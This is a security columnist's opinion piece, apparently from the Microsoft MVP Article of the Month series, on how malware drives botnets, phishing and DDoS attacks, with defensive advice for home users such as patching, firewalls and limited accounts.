Malicious Software: One Person's Perspective

By Paul Laudanski, CastleCops , Microsoft MVP Windows-Security

See other Security MVP Article of the Month columns.

There have been many times while playing Zuma on our Xbox 360 that my wife or I failed to complete a level before using all our lives, and so we would just restart and try again. It sure is nice having another shot at the same level regardless of how we previously did. Imagine, for a moment, what life would be like with computers sans malicious software, or malware. What if we could “try again” and remove malicious software from the human timeline?

All of a sudden, many of the problems we experience today would be gone. Distributed denial-of-service attacks would have no meaning. Spam would no longer deluge our inboxes. Our confidential user accounts would not be revealed via keyloggers. Sony would never have installed spyware, nor would the FTC issue a judgment against them. Banks and consumers would not be defrauded of money. Rootkits and a plethora of other threats would not exist. Alas, these are the effects of malware software today, and, sadly, we cannot erase them from our past or present.

In the beginning, before the Internet, malicious software was spread by the sneakernet. Often times malware was written to run off a floppy disk boot sector. But in this day and age, malware has matured beyond hard drive formats and file deletions. Thanks to malware, we see compromised computers on the Internet generally used as bots in a botnet. These botnets are controlled by bot herders which are leased to other miscreants to conduct malicious activities such as spamming (pump and dump, pharmaceutical, etc.), phishing, and distributed denial of service attacks. Malicious software has created a convoluted blended threat in today’s world. These attacks have expanded because of the money involved, which, as MessageLabs states, is a multibillion dollar industry—albeit an illegal one.

Since the launch of CastleCops, we have seen malicious software shift and morph from preblended malware with non-fraudulent targets into today’s high tech espionage. Furthermore, since 2006 and the launch of the Phishing Incident Reporting and Termination Squad (PIRT), we have witnessed malware control an ever-increasing number of bots.

How is it that these systems are being used for phishing attacks? Phishing starts off with spam e-mail. For the most part, unless users get an e-mail with a link to the phish site, it will not be visited by potential victims. Typically, the spam is sent by compromised computers that are owned by the malefactors. These systems are generally always-on broadband-connected personal computers that have been infected with malware. These same bots are frequently used to run a distributed phishing attack. So if one bot is successfully taken offline and repaired, another bot will spring into action, keeping the phish alive.

There are also cases where Web servers have been compromised by lack of secure coding or defenses. These legitimate Web servers often run unpatched Web applications that criminals exploit. In such instances, a malformed request is sent to the Web application, which downloads a Web shell giving the culprit access to the command line on the server. At this point, the trespasser, through the use of the Web shell, downloads and installs a ready-made “kit” that can send spam, run a phish, or set up a command and control server that tells the bots in the herd what to do.

So as potential victims receive phish spam, the miscreants play the numbers game. The more people who receive the spam, the more who become victims. The evildoers hope that their phish sites will deceptively gather consumer information such as credit card numbers, social security numbers, names, birth dates, home addresses, phone numbers, user logins, and passwords—all of which can be used for bank fraud and identity theft.

Spam e-mails are the catalysts for many ill-intended activities like mortgage scams, mules, phishing, pump and dumps, pharmaceuticals, and trojans that focus on bot assimilation. Beyond spamming and phishing, bots are often used to shut down or extort money from a Web site.

In December 2006 through January 2007, the highly regarded antirootkit application GMER had its Web site taken offline by a distributed denial of service attack. The malware running on the infected computers were tasked with a command to flood the www.gmer.net domain with HTTP requests. The attack effectively shut down access to the site, and ultimately prevented victims from downloading GMER in order to expose and remove rootkits from their systems. Thankfully, many in the community responded by bringing up mirrors, but many of them were also targeted by the botnet and subsequently taken offline. GMER was not back online until, thanks to Paul Vixie, the domain was moved to the Internet Systems Consortium, which has the capacity and ability to absorb the attack.

Around the middle of February 2007, CastleCops itself became the target of a large scale DDoS. Not new to this kind of attack, it is the first time CastleCops experienced such a large throughput at nearly 1Gbit/s. Prolexic offered their services pro-bono protecting our name servers. ISC OARC graciously donated hosting services to absorb the attack. The community-at-large in a tour de force rescue effort saved CastleCops. We will not be silenced.

Malware is not just a technical problem; it is also a social pandemic. Take the case of the phish spam, for instance. Many Internet citizens are, by nature, trusting. When potential victims receive an e-mail about how they can help their bank to recover their account after a system upgrade, they generally think they are being good citizens by responding. In fact, one reporter I spoke with last year had this happen to him. One morning he received an e-mail purporting to be from his bank, and, being a good bank citizen, he wanted to help recover his information by furnishing it at the Web site link provided. It wasn’t until later that the reporter realized it was a phish scam, not really a request from his bank.

Money drives crooks today to deploy malicious software. So how do we find, track, and categorize that malware across the globe? A recently launched service by Arbor Networks, the Active Threat Level Analysis System (ATLAS), attempts to do just that. Arbor Networks has the reach and visibility on the Internet backbones to track malicious activity, which in turn enables them to provide intelligence about malicious software, phishing, and botnets in real time. The public has access to this information at the ATLAS Web site. It is this kind of data enrichment that will help find and put an end to ill-intended behavior.

So what can ordinary Netizens do to help protect the Internet against malware? I attend conferences and give presentations on such topics, and one question I love to ask is akin to “How many of you delete your spam?” Typically, many people raise their hands. But what should be done? Communication is necessary to bring an end to malicious behavior and that is no different here. The spam we all receive is actually evidence of a crime. Forward your spam to the proper authorities and organizations that not only track, but also investigate, preserve, and take down the scams—efforts that can lead to arrests and prosecutions. Let us band together and send a clear message to malware writers and other lawbreakers that we are taking back our Internet.

But what can we do to secure our computers? We must run updated anti-malware applications that spot malware through heuristics as well as data definitions. Sometimes we have to deal with zero day threats which are often difficult to detect using known dictionaries, so running a firewall with both outbound and inbound protection is crucial. Such a firewall can detect and alert on any unauthorized outbound connection attempts. Another critical component in keeping your computer free from bot herders is to patch your operating system and applications. Much of today’s malware targets Microsoft systems that are not patched, so be sure to pay attention to Microsoft’s “Patch Tuesday.” But, more importantly, do not use your computer on a regular basis with a profile that has administrative access. Instead, create and logon with a profile that has restricted access rights so that if zero day malware is downloaded, it may be hindered from executing due to the limited permissions of such an unprivileged account. You want to set up as many layers of defenses as possible making it difficult for the transgressors to control your system. The new Microsoft Vista operating system, as a point of interest, makes this the default setup.

In addition, set up your anti-malware scanners to monitor your activity in real time on top of a scheduled full system scan. There are also online scanner vendors you can tap into to provide another independent analysis of your computer. CastleCops maintains a list of vendors that provide free security solutions if you cannot afford a pay-for product.

Microsoft has its own free anti-malware scanner, updated on Patch Tuesdays, called the Windows Malicious Software Removal Tool (MSRT). The MSRT team released a white paper on its progress and lessons learned, which includes statistics such as 16 million instances of malware were removed from more than 5.7 million unique Windows installations during a 15-month period. One in every 311 computers was infected with malware! Windows Live OneCare, another product by Microsoft, offers greater malware detection than the MSRT tool including a full suite of security services.

So what will it take to defeat the offenders and the severity of today’s blended malicious software once and for all? Communication and teamwork are required among industry (Internet Service Providers, Registrars, Banks, and Public Advocacy Groups), government (Law Enforcement, Computer Emergency Response Teams, and Prosecutors), academia, and consumers. But trust is required to build teamwork. And the individuals (developers, system administrators, lawyers, and management) can foster trust by being truthful. There is logic in the saying, “As truth stretches, trust breaks.” With the technical solutions in place supported by globalized teamwork, we have a high chance of success in bringing an end to the malware plague. And in this pledge, we can take back our Internet and win this fight against the dark side.